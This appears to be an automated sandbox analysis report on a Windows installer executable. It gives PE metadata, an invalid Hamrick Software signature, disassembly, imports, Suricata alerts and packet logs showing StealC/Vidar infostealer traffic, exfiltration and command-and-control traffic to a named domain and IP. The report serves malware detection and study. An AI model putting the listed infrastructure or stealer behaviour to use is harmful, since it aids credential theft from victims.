                                                                                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                          Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                          Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                                                                                                                                          Signature Valid:false
                                                                                                                                                                                                                                                                                          Signature Issuer:CN=DigiCert Assured ID Code Signing CA-1, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                                                                                                                                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                                          Error Number:-2146869232
                                                                                                                                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                                                                                                                                          • 17/01/2016 19:00:00 27/03/2019 08:00:00
                                                                                                                                                                                                                                                                                          Subject Chain
                                                                                                                                                                                                                                                                                          • CN=Hamrick Software, O=Hamrick Software, L=Sunny Isles Beach, S=Florida, C=US
                                                                                                                                                                                                                                                                                          Version:3
                                                                                                                                                                                                                                                                                          Thumbprint MD5:EED0330F674889C759718E9634C7CFBE
                                                                                                                                                                                                                                                                                          Thumbprint SHA-1:72DA31A1E39FF2688E01CC9246F9655C5479DC44
                                                                                                                                                                                                                                                                                          Thumbprint SHA-256:2F0E03F8BCDEEFFF96E71C8AFD36F929E0DABD73E2991FF44A5F571DE8BC4D20
                                                                                                                                                                                                                                                                                          Serial:0E3580050E04BCD215040A908ECA4FCA
                                                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                                                          sub esp, 000002D4h
                                                                                                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                                                                                          push 00000020h
                                                                                                                                                                                                                                                                                          xor ebp, ebp
                                                                                                                                                                                                                                                                                          pop esi
                                                                                                                                                                                                                                                                                          mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                                          mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                                          mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                                          call dword ptr [00409030h]
                                                                                                                                                                                                                                                                                          push 00008001h
                                                                                                                                                                                                                                                                                          call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                                          call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                                          push 00000008h
                                                                                                                                                                                                                                                                                          mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                                                          call 00007FCED06E6B5Bh
                                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                                          push 000002B4h
                                                                                                                                                                                                                                                                                          mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                                                          lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                                          push 0040A264h
                                                                                                                                                                                                                                                                                          call dword ptr [00409184h]
                                                                                                                                                                                                                                                                                          push 0040A24Ch
                                                                                                                                                                                                                                                                                          push 00476AA0h
                                                                                                                                                                                                                                                                                          call 00007FCED06E683Dh
                                                                                                                                                                                                                                                                                          call dword ptr [004090B0h]
                                                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                                                          mov edi, 004CF0A0h
                                                                                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                                                                                          call 00007FCED06E682Bh
                                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                                          call dword ptr [00409134h]
                                                                                                                                                                                                                                                                                          cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                                                          mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                                                          mov eax, edi
                                                                                                                                                                                                                                                                                          jne 00007FCED06E412Ah
                                                                                                                                                                                                                                                                                          push 00000022h
                                                                                                                                                                                                                                                                                          pop esi
                                                                                                                                                                                                                                                                                          mov eax, 004CF0A2h
                                                                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                                                          call 00007FCED06E6501h
                                                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                                                          call dword ptr [00409260h]
                                                                                                                                                                                                                                                                                          mov esi, eax
                                                                                                                                                                                                                                                                                          mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                                                          jmp 00007FCED06E41B3h
                                                                                                                                                                                                                                                                                          push 00000020h
                                                                                                                                                                                                                                                                                          pop ebx
                                                                                                                                                                                                                                                                                          cmp ax, bx
                                                                                                                                                                                                                                                                                          jne 00007FCED06E412Ah
                                                                                                                                                                                                                                                                                          add esi, 02h
                                                                                                                                                                                                                                                                                          cmp word ptr [esi], bx
                                                                                                                                                                                                                                                                                          Programming Language:
                                                                                                                                                                                                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                          • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                          • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                          • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0xa9a2 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xd7e2f | 0x39e8 | .ndata
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x72b9c | 0x200 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x100000 | 0xa9a2 | 0xaa00 | c926895c2febff432824055c5777f47f | False | 0.9693933823529411 | data | 7.906509665720962 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x10b000 | 0xfd6 | 0x1000 | 7c4854a2b1b8a5c7c537ee59a4a60e92 | False | 0.59814453125 | data | 5.597703433351911 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x1001f0 | 0x7ba9 | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 1.0005054174432195
RT_ICON | 0x107d9c | 0x221a | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0012600229095074
RT_ICON | 0x109fb8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6640070921985816
RT_DIALOG | 0x10a420 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x10a520 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x10a63c | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x10a69c | 0x30 | data | English | United States | 0.8958333333333334
RT_MANIFEST | 0x10a6cc | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-19T08:13:18.190912+0100 | 2058401 | ET MALWARE StealC/Vidar CnC Domain in DNS Lookup (hulkpara .xyz) | 1 | 192.168.2.7 | 49532 | 1.1.1.1 | 53 | UDP
2024-12-19T08:13:20.427564+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49711 | 94.130.191.168 | 443 | TCP
2024-12-19T08:13:22.521418+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49712 | 94.130.191.168 | 443 | TCP
2024-12-19T08:13:23.416803+0100 | 2859378 | ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 | 1 | 192.168.2.7 | 49712 | 94.130.191.168 | 443 | TCP
2024-12-19T08:13:24.821968+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49713 | 94.130.191.168 | 443 | TCP
2024-12-19T08:13:27.119770+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49714 | 94.130.191.168 | 443 | TCP
2024-12-19T08:13:28.014169+0100 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 94.130.191.168 | 443 | 192.168.2.7 | 49714 | TCP
2024-12-19T08:13:29.423259+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49715 | 94.130.191.168 | 443 | TCP
2024-12-19T08:13:30.307378+0100 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 | 1 | 192.168.2.7 | 49715 | 94.130.191.168 | 443 | TCP
2024-12-19T08:13:30.307549+0100 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 94.130.191.168 | 443 | 192.168.2.7 | 49715 | TCP
2024-12-19T08:13:31.723358+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49716 | 94.130.191.168 | 443 | TCP
2024-12-19T08:13:32.954374+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49717 | 94.130.191.168 | 443 | TCP
2024-12-19T08:13:40.831957+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49736 | 94.130.191.168 | 443 | TCP
2024-12-19T08:13:41.880678+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49737 | 94.130.191.168 | 443 | TCP
2024-12-19T08:13:43.947680+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49739 | 94.130.191.168 | 443 | TCP
2024-12-19T08:13:45.968071+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49740 | 94.130.191.168 | 443 | TCP
2024-12-19T08:13:46.973345+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49741 | 94.130.191.168 | 443 | TCP
2024-12-19T08:13:53.767368+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49760 | 94.130.191.168 | 443 | TCP
2024-12-19T08:13:54.635958+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49770 | 94.130.191.168 | 443 | TCP
2024-12-19T08:13:56.820152+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49789 | 94.130.191.168 | 443 | TCP
2024-12-19T08:13:58.754131+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49807 | 94.130.191.168 | 443 | TCP
2024-12-19T08:14:00.909391+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49816 | 94.130.191.168 | 443 | TCP
2024-12-19T08:14:02.947261+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49825 | 94.130.191.168 | 443 | TCP
2024-12-19T08:14:05.283778+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49832 | 94.130.191.168 | 443 | TCP
2024-12-19T08:14:06.624975+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49842 | 94.130.191.168 | 443 | TCP
2024-12-19T08:14:08.909675+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49850 | 94.130.191.168 | 443 | TCP
2024-12-19T08:14:11.258987+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49854 | 94.130.191.168 | 443 | TCP
2024-12-19T08:14:14.365988+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49863 | 94.130.191.168 | 443 | TCP
2024-12-19T08:14:17.452513+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49865 | 94.130.191.168 | 443 | TCP
2024-12-19T08:14:19.855709+0100 | 2058402 | ET MALWARE Observed StealC/Vidar Stealer Domain (hulkpara .xyz in TLS SNI) | 1 | 192.168.2.7 | 49868 | 94.130.191.168 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:18.183406115 CET44349710149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:18.183434963 CET44349710149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:18.183451891 CET49710443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:18.183528900 CET49710443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:18.183537006 CET44349710149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:18.183567047 CET44349710149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:18.183582067 CET49710443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:18.183624983 CET49710443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:18.187243938 CET49710443192.168.2.7149.154.167.99
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:18.187257051 CET44349710149.154.167.99192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:18.593983889 CET49711443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:18.594012976 CET4434971194.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:18.594093084 CET49711443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:18.594544888 CET49711443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:18.594566107 CET4434971194.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:18.625695944 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:20.427414894 CET4434971194.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:20.427563906 CET49711443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:20.431596994 CET49711443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:20.431615114 CET4434971194.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:20.431924105 CET4434971194.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:20.431996107 CET49711443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:20.432327986 CET49711443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:20.479331017 CET4434971194.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:21.110922098 CET4434971194.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:21.110999107 CET4434971194.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:21.111015081 CET49711443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:21.111042023 CET49711443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:21.114077091 CET49711443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:21.114093065 CET4434971194.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:21.115947962 CET49712443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:21.115998983 CET4434971294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:21.116075039 CET49712443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:21.116281986 CET49712443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:21.116295099 CET4434971294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:22.521326065 CET4434971294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:22.521418095 CET49712443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:22.521929979 CET49712443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:22.521936893 CET4434971294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:22.524231911 CET49712443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:22.524236917 CET4434971294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:23.416575909 CET4434971294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:23.416650057 CET49712443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:23.416672945 CET4434971294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:23.416687012 CET4434971294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:23.416718006 CET49712443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:23.416738987 CET49712443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:23.416990042 CET49712443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:23.417009115 CET4434971294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:23.419047117 CET49713443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:23.419086933 CET4434971394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:23.419162035 CET49713443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:23.419461966 CET49713443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:23.419476032 CET4434971394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:24.821878910 CET4434971394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:24.821968079 CET49713443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:24.893699884 CET49713443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:24.893714905 CET4434971394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:24.895854950 CET49713443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:24.895860910 CET4434971394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:25.715671062 CET4434971394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:25.715698957 CET4434971394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:25.715745926 CET49713443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:25.715765953 CET4434971394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:25.715778112 CET4434971394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:25.715792894 CET49713443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:25.715857029 CET49713443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:25.716213942 CET49713443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:25.716233969 CET4434971394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:25.718045950 CET49714443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:25.718082905 CET4434971494.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:25.718162060 CET49714443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:25.718445063 CET49714443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:25.718455076 CET4434971494.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:27.119522095 CET4434971494.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:27.119770050 CET49714443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:27.120209932 CET49714443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:27.120227098 CET4434971494.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:27.122068882 CET49714443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:27.122091055 CET4434971494.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:35.947484016 CET49724443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:36.121905088 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:36.126101971 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:36.126130104 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:36.127137899 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:36.127214909 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:36.127682924 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:36.127733946 CET44349725172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:36.127865076 CET49725443192.168.2.7172.217.19.228
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:36.130707979 CET44349723172.217.19.228192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:36.130747080 CET44349723172.217.19.228192.168.2.7
